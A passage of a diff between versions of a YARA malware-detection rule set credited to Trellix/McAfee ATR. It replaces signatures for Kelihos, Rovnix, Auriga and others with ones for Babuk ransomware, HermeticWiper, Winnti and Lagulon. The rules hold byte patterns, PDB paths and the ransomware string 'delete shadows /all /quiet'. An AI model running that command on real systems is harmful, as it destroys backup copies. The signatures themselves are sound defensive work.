"2a7e1676a20f30b0cb0321579bb85e4836e2aee5f56b838d2ff2bec7a08c489f" score = 75 - quality = 70 - tags = "DROPPER, FILE" + quality = 64 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "dropper" - malware_family = "Dropper:W32/Demekaf" + malware_type = "ransomware" + malware_family = "Ransom:W32/CoronaVirus" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\vc\\res\\fake1.19-jpg\\fake\\Release\\fake.pdb" + $s1 = { 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 } + $s2 = { 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 } + $s3 = { 2F 00 75 00 70 00 6C 00 6F 00 61 00 64 00 2F 00 25 00 73 00 5F 00 25 00 64 00 5F 00 25 00 73 00 } + $s4 = { 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 43 6F 6E 74 72 6F 6C 5C 53 65 73 73 69 6F 6E 20 4D 61 6E 61 67 65 72 } + $s5 = { 5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 } condition: - uint16(0)==0x5a4d and filesize <150KB and any of them + uint16(0)==0x5a4d and filesize <100KB and all of them } -rule TRELLIX_ARC_Kelihos_Botnet_Pdb : BOTNET FILE +rule TRELLIX_ARC_Ransom_Babuk : RANSOM T1027 T1083 T1057 T1082 T1129 T1490 T1543_003 FILE { - meta: - description = "Rule to detect Kelihos malware based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "2b6683a1-ba19-586b-8a92-89d4764efa12" - date = "2013-09-04" - modified = "2020-08-14" - reference = "https://www.malwaretech.com/2017/04/the-kelihos-botnet.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_kelhios_botnet_pdb.yar#L1-L26" + meta: + description = "Rule to detect Babuk Locker" + author = "TS @ McAfee ATR" + id = "7c0a3b4e-90aa-5442-aa5e-1a7fcae9bec8" + date = "2021-01-19" + modified = "2021-02-24" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_BabukLocker_Jan2021.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "f0a6d09b5f6dbe93a4cf02e120a846073da2afb09604b7c9c12b2e162dfe7090" - logic_hash = "f60fb85161f86653f390b444d568da24cf07b3be99856230156741e8451e2a3f" + hash = "e10713a4a5f635767dcd54d609bed977" + logic_hash = "123cebd1c2e66f3e91ee235cb9288df63dfaeba02e6df45f896cb50f38851a8f" score = 75 quality = 70 - tags = "BOTNET, FILE" - rule_version = "v1" - malware_type = "botnet" - malware_family = "Botnet:W32/Kelihos" - actor_type = "Cybercrime" - actor_group = "Unknown" + tags = "RANSOM, T1027, T1083, T1057, T1082, T1129, T1490, T1543.003, FILE" + rule_version = "v2" + malware_family = "Ransom:Win/Babuk" + malware_type = "Ransom" + mitre_attack = "T1027, T1083, T1057, T1082, T1129, T1490, T1543.003" strings: - $pdb = "\\Only\\Must\\Not\\And.pdb" - $pdb1 = "\\To\\Access\\Do.pdb" + $s1 = {005C0048006F007700200054006F00200052006500730074006F0072006500200059006F00750072002000460069006C00650073002E007400780074} + $s2 = "delete shadows /all /quiet" fullword wide + $pattern1 = {006D656D74617300006D65706F63730000736F70686F730000766565616D0000006261636B7570000047785673730000004778426C7200000047784657440000004778435644000000477843494D67720044656657617463680000000063634576744D67720000000063635365744D677200000000536176526F616D005254567363616E0051424643536572766963650051424944505365727669636500000000496E747569742E517569636B426F6F6B732E46435300} + $pattern2 = {004163725363683253766300004163726F6E69734167656E74000000004341534144324457656253766300000043414152435570646174655376630000730071} + $pattern3 = {FFB0154000C78584FDFFFFB8154000C78588FDFFFFC0154000C7858CFDFFFFC8154000C78590FDFFFFD0154000C78594FDFFFFD8154000C78598FDFFFFE0154000C7859CFDFFFFE8154000C785A0FDFFFFF0154000C785A4FDFFFFF8154000C785A8FDFFFF00164000C785ACFDFFFF08164000C785B0FDFFFF10164000C785B4FDFFFF18164000C785B8FDFFFF20164000C785BCFDFFFF28164000C785C0FDFFFF30164000C785C4FDFFFF38164000C785C8FDFFFF40164000C785CCFDFFFF48164000C785D0FDFFFF50164000C785D4FDFFFF581640} + $pattern4 = {400010104000181040002010400028104000301040003810400040104000481040005010400058104000601040006C10400078104000841040008C10400094104000A0104000B0104000C8104000DC104000E8104000F01040000011400008114000181140002411400038114000501140005C11400064114000741140008C114000A8114000C0114000E0114000F4114000101240002812400034124000441240005412400064124000741240008C124000A0124000B8124000D4124000EC1240000C1340002813400054134000741340008C134000A4134000C4134000E8134000FC134000141440003C144000501440006C144000881440009C144000B4144000CC144000E8144000FC144000141540003415400048154000601540007815} condition: - uint16(0)==0x5a4d and filesize <1440KB and any of them + filesize >=15KB and filesize <=90KB and 1 of ($s*) and 3 of ($pattern*) } -rule TRELLIX_ARC_Rovnix_Downloader : DOWNLOADER +rule TRELLIX_ARC_Hermeticwiper : TROJAN FILE { meta: - description = "Rovnix downloader with sinkhole checks" - author = "Intel Security" - id = "d51f8f73-7a3a-5ccf-9122-86061b5399f1" - date = "2024-09-01" - modified = "2020-08-14" - reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_Rovnix.yar#L1-L38" + description = "Detecting variants of Hermetic Wiper malware discovered in UA" + author = " cb @ Trellix ATR" + id = "fc6d9238-b732-541d-b083-11b43fe8770d" + date = "2022-02-24" + modified = "2022-02-24" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Troj_HermWiper.yar#L1-L27" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "52cde40c95436129b7d48b4bd5e78b66deb84fdc84a76cc9ac72f24e0777e540" + logic_hash = "b48e91afa19e09c7035ccda1b9293448e834d612b9a953b593f9412acb78faac" score = 75 - quality = 43 - tags = "DOWNLOADER" - malware_type = "downloader" - malware_family = "Downloader:W32/Rovnix" - actor_type = "Cybercrime" - actor_group = "Unknown" + quality = 70 + tags = "TROJAN, FILE" + rule_version = "v1" + malware_type = "Trojan" strings: - $sink1 = "control" - $sink2 = "sink" - $sink3 = "hole" - $sink4 = "dynadot" - $sink5 = "block" - $sink6 = "malw" - $sink7 = "anti" - $sink8 = "googl" - $sink9 = "hack" - $sink10 = "trojan" - $sink11 = "abuse" - $sink12 = "virus" - $sink13 = "black" - $sink14 = "spam" - $boot = "BOOTKIT_DLL.dll" - $mz = { 4D 5A } + $0 = {E4B5518CD941310A015E4AF8E5968C8231492FE19246A293A569D5D7A36F56EB2FC5B68FFF6F3359C19AF6806920C3FE6628F90A75440E6616297A031BA6075100D72DFAA9829E772E45D77B89F862081EAFDB19B4B2DCEF3F273FF645ACCEAA4B991F98373973C0FB25829E860D9BC195EF1A0AD9219456AD077D42868EE03EE00E88D04C434BA97E88DF99273A35E2C668A1C69954B4762390ABDFBE4CD4AF} + $1 = {90506F1C825F7AE0D8605F5C627CA325BFF199AB60A63DE8A90E923F4B18D7FB039E1DEC89D573AAB0A14C1D4BA70EB444753A41C03082A60CB4DB551393F2C50988A3181E7F31D01B5AAD94070432D98F18655AB8A555919FEFEA9DE1EDF1} + $2 = {D5EEF61336015A85FF04ED298A6BDD6742FF153E33DAF9B383A5FFDCE7E64D47748DB5FF2609DF9BD5C66735FF6916797B2D365313FF1461EAEB9DAEA754FF6D4D55D1956CC8CBFF75C10CE74BF88C8DFF3B553B839D42609FFF2916227230} + $3 = {6C750DDC932124500CE9B5AB91CE101BE9AD348220E9423124512282373675152281023428825C51770FE9841F853375125382F732750A5B83F60FEB6AEE2282647462228269745AEE22826F7452228275744AEE2282787442} + $4 = {19A8A063FFAAAF6C1E7F78A896FFFA5C8F30BA98B69CFF1961E107BEB7636AFF9EA56A4FC4EDE3F1FF295235ACD0185726FFADA6B8CB54B342C9FF86F58524DC91617BFFB4388DBE01B6CF86} + $5 = {50C449606B20184A6328556032197660AAF9507861609F6160640560B4546160C3A194056070C4A09EC4A01A0461A4C4A0831B16600561916069A291607061C09160AA1CB6204A} + $6 = {FFEB19D2636B8B95273156BB63E8C78470D55970F47CF26574B46DE86EE084704590CA8053F15320258BBD1AACF18B04F2E965C6605CB10880B7E8FCF53DF5EB0621635EFF} + $7 = {7E31126E14B8FF98554F6FCFB64207FFCF8D93B2573609C2FF99E4409F73BB9322FF1E5E380DC0BBABCAFF4B901EDF61BD6A68FFEE3253728C7769ABFF7BCDA939C959A282} + $8 = {1970FFC6F8AA7C32EE693CFF369579E5355EF62CFF682CEAF20BA3EA1CFF1AAC638666431B20FF54293D1E709C231AFFCD11B55599F64CB9FF1E5A9015DC867F} + $9 = {8DFF93B2573609C299E4FF409F73BB93221E5EFF380DC0BBABCA4B90FF1EDF61BD6A68EE32FF53728C7769AB7BCDFFA939C959A282D312FF5DD04F0370CE811F} + $10 = {DF5519064E31101CF3DA96C15FF96728B708F358F51759E3A22FFA1CF1BB986A2038D6753E6BF037945B8469ADF20BAB71E10F3DE27735F640704C970DFE8672} condition: - $mz in (0..2) and all of ($sink*) and $boot + uint16(0)==0x5a4d and filesize <200KB and all of them } -rule TRELLIX_ARC_Malw_Eicar : EICAR +rule TRELLIX_ARC_Apt_Lagulon_Trojan_Pdb : TROJAN FILE { meta: - description = "Rule to detect the EICAR pattern" + description = "Rule to detect trojan Lagulon based on PDB" author = "Marc Rivero | McAfee ATR Team" - id = "16307b03-7fab-5d68-ad3b-0efcea952fcf" - date = "2024-09-01" + id = "a31a465d-1f16-5c3e-a62d-ea15c11253c3" + date = "2013-08-31" modified = "2020-08-14" - reference = "https://www.eicar.org/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_Eicar.yar#L1-L22" + reference = "https://www.cylance.com/operation-cleaver-cylance" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_lagulon_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f" - logic_hash = "564b0592f40582fe71e2dab0c0f25c168462f9297c13e7c9f06ac51b492e4533" + hash = "e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53" + logic_hash = "dad04c2deb990f253f952b768b74349dc9afb5f6db91ea3afff889f4c9f3230b" score = 75 quality = 70 - tags = "EICAR" - malware_type = "eicar" - malware_family = "W32/Eicar" - actor_type = "Unknown" + tags = "TROJAN, FILE" + rule_version = "v1" + malware_type = "trojan" + malware_family = "Trojan:W32/lagulon" + actor_type = "Apt" actor_group = "Unknown" strings: - $s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii + $pdb = "\\proj\\wndTest\\Release\\wndTest.pdb" condition: - any of them + uint16(0)==0x5a4d and filesize <50KB and any of them } -rule TRELLIX_ARC_Apt_Auriga_Driver : KERNELDRIVER FILE +rule TRELLIX_ARC_APT_Winnti : BACKDOOR FILE { meta: - description = "Rule to detect the Auriga driver" - author = "Marc Rivero | McAfee ATR Team" - id = "b61058a1-1b48-5be1-ba2f-74a7c3d38825" - date = "2013-03-13" - modified = "2020-08-14" - reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_auriga_biscuit.yar#L1-L39" + description = "Detects Winnti variants" + author = "McAfee ATR Team" + id = "f12b039a-2508-580f-b777-428bbda2c666" + date = "2020-06-04" + modified = "2020-10-14" + reference = "https://attack.mitre.org/software/S0141/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_winnti.yar#L1-L27" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "207eee627a76449ac6d2ca43338d28087c8b184e7b7b50fdc60a11950c8283ec" - logic_hash = "c027073ba398fe89d418be67f0850c8d9e4d4c50a991c45b84cdb416497ccf1c" + hash = "fd539d345821d9ac9b885811b1f642aa1817ba8501d47bc1de575f5bef2fbf9e" + logic_hash = "f94b2c552fbb30e1005e5c75a2f449d60b9558a0916197bed41bf32c6477daef" score = 75 quality = 70 - tags = "KERNELDRIVER, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "kerneldriver" - malware_family = "Driver:W32/Auriga" - actor_type = "APT" - actor_group = "APT1" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Winnti" + actor_type = "Apt" + actor_group = "Unknown" strings: - $s1 = "\\SystemRoot\\System32\\netui.dll" fullword wide - $s2 = "\\SystemRoot\\System32\\drivers\\riodrv32.sys" fullword wide - $s3 = "\\SystemRoot\\System32\\arp.exe" fullword wide - $s4 = "netui.dll" fullword ascii - $s5 = "riodrv32.sys" fullword wide - $s6 = "\\netui.dll" fullword wide - $s7 = "d:\\drizt\\projects\\auriga\\branches\\stone_~1\\server\\exe\\i386\\riodrv32.pdb" fullword ascii - $s8 = "\\riodrv32.sys" fullword wide - $s9 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\riodrv32" fullword wide - $s10 = "\\DosDevices\\rio32drv" fullword wide - $s11 = "e\\Driver\\nsiproxy" fullword wide - $s12 = "(C) S3/Diamond Multimedia Systems. All rights reserved." fullword wide - $s13 = "\\Device\\rio32drv" fullword wide - $s14 = "\\Registry\\Machine\\SOFTWARE\\riodrv" fullword wide - $s15 = "\\Registry\\Machine\\SOFTWARE\\riodrv32" fullword wide + $pattern = { 9090909090909090909090909090C7????????????C2????90909090909081??????????E9????????CCCCCCCCCC8A??????8B??????538A??8A??568B??578B??????8B??C1????66????8B??C1????F3AB8B??83????F3AA8B??5F5E5BC390909090909090909090909090909083????5333??568D??????535089??????89??????E8????????8A??33??3A??8D??????0F94??83????5389??????528B??89??????C6????????E8????????8B??33??81??????????8D??????0F94??6A??89??????5223??89??????C6????????C6????????E8????????33??66????8D??????6A??0F94??89??????89??????5223??C6????????C6????????E8????????8B??83????33??3B??0F94??23??5E495BF7??1B??8B??83????C38B??????8B??????03??C390909090908B??????85??0F84????????8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??E9????????83????C39090909090909090909090909083????8B??????53558B??????33??568B??????83????5789??????76??81??????????8B??76??BF????????8B??????8D????03??C1????03??89??????3B??76??8B??????68????????6A??52E8????????8B??????8B??????8B??????505351565752E8????????8B??????8B??8B??????2B??8B??83????03??8B??????83????89??????77??03??0F84????????8B??????8B??????2B??03??3B??89??????75??81??????????77??8A??04??EB??83????77??08????EB??83????77??8A??80????88??EB??8D????C6????463D????????89??????76??8D????B8????????F7??C1????8B??33??8B??8B??C1????F3AB8B??83????03??F3AA8B??????81??????????4A89??????75??8B??????8B??88??468A??88??46424B75??8B??????C6????465FC6????46C6????2B??8B??????4633??89??5E5D5B83????C390909090909090909083????8B??????53558B??????568B??????8D????5789??????8B??????83????73??B8????????2B??EB??33??03??8B??2B??C1????8D??????89??????8B??????8B??????8D????3B??0F83????????8B??8B??69??????????8B??????8B??????C1????33??66??????03??8B??????2B??????89??????66??????8B??3B??0F85????????8B??????C7??????????????2B??8B??????8B??2B??0F84????????83????77??8A????0A??88????8B????89??03??E9????????83????77??8A??2C??88??468B????89??8B????89????8B????89????8B????89????03??E9????????83????77??8A??80????88??46EB??8D????C6????463D????????89??????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??8B??????81??????????4889??????75??8B??????8B??8B??????88??468B????89??8B????89????8B????89????8B????89????83????83????83????83????73??85??76??8A????88??46454B75??BB????????8B????8B????33??75??BB????????03??8B????8B??33??8B??????83????3B??73??8B??2B??????85??75??83????83????8B????8B??33??8B??????3B??72??EB??84??75??C1????4384??74??8B??????8B??03??2B??83????89??????77??3D????????77??4880????8A??80????C0????C0????0A??88??46C1????88??46E9????????3D????????77??4883????89??????77??80????80????EB??83????C6????4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????2D????????83????89??????77??8B??80????C1????80????8A??0A??80????88??46C0????88??46C1????88??46E9????????8B??83????C1????80????80????88??4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????8B??????E9????????8B??????8B??????8B??????2B??89??8B??5F2B??5E5D03??5B83????C390909090909090909090908B??????538B??????55568B??????C7??????????578A??8D????8B?????